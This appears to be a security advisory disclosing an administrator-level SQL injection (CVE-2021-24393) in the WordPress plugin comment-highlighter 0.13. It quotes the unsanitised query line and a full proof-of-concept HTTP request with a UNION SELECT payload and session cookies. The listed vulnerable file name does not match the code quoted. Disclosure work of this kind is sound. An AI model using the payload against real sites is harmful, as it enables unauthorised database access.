Plugin Details
Plugin Name: wp-plugin : comment-highlighter
Effected Version : 0.13 (and most probably lower version's if any)
Vulnerability : Injection
Minimum Level of Access Required : Administrator
CVE Number : CVE-2021-24393
Identified by : Syed Sheeraz Ali
Disclosure Timeline
-
May 9, 2021: Issue Identified and Disclosed to WPScan
- June 10, 2021 : Plugin Closed
- June 10, 2021 : CVE Assigned
- July 23, 2021 : Public Disclosure
Technical Details
Vulnerable File: admin/section/swiftbook-add-email-templates.php#30
Vulnerable Code block and parameter:
Administrator level SQLi for parameter c
/comment_highlighter.php#252
252: $_meta = $wpdb->get_row ( "SELECT * FROM {$wpdb->comments} WHERE comment_ID = {$_GET['c']};" ) ;
PoC Screenshots
Exploit
GET /wp-admin/options-general.php?page=comment-highlighter/comment_highlighter.php&c=-6104 UNION ALL SELECT NULL,NULL,NULL,NULL,user(),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- - HTTP/1.1
Host: 172.28.128.50
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-GPC: 1
Accept-Encoding: gzip, deflate
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8
Cookie: wordpress_232395f24f6cff47569f2739c21385d6=admin%7C1620294886%7Ctn6H7RLPJTvziONomBzo4HWZVyhNQODgv5tIyFrZRMJ%7Ccbc7286b562f5238e37cad754aa7f390c9dafa068d48dc269b6158bf01403e34; wordpress_test_cookie=WP%20Cookie%20check; tk_ai=woo%3AiQVT6EvbuCedvp65Wb1%2BuUEl; wordpress_logged_in_232395f24f6cff47569f2739c21385d6=admin%7C1620294886%7Ctn6H7RLPJTvziONomBzo4HWZVyhNQODgv5tIyFrZRMJ%7C29655e636b344a7efb297b6d69fe06cf52f7ef5e203c357dc1dca4bb46082e4e; wp-settings-1=mfold%3Do%26editor%3Dtinymce; wp-settings-time-1=1620122086
Connection: close
<td><input type='text' name='txt_url' style='width: 250px;' value='bob@localhost' /></td><td>